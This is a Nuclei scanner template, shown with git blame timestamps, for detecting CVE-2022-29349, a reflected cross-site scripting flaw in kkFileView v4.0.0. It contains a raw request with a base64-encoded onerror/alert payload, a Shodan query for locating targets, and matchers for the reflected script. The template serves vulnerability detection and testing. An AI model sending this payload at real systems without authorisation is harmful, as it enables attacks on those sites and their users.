nuclei-templates/cves/2022/CVE-2022-29349.yaml

32 lines
914 B
YAML
Raw Normal View History

2022-08-18 11:21:32 +00:00
id: CVE-2022-29349
info:
name: kkFileView v4.0.0 - Cross Site Scripting
author: arafatansari
severity: medium
description: |
kkFileView v4.0.0 was discovered to contain multiple cross-site scripting (XSS) vulnerabilities via the urls and currentUrl parameters at /controller/OnlinePreviewController.java.
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29349
- https://github.com/kekingcn/kkFileView/issues/347
metadata:
shodan-query: http.html:"kkFileView"
verified: "true"
tags: xss,cve,2022
requests:
2022-08-18 11:29:55 +00:00
- raw:
2022-08-18 11:21:32 +00:00
- |
GET /onlinePreview?url=aHR0cDovL3d3dy54eHguY29tL3h4eC50eHQiPjxpbWcgc3JjPTExMSBvbmVycm9yPWFsZXJ0KDEpPjEyMw%3D%3D HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- '"><img src=111 onerror=alert(1)>'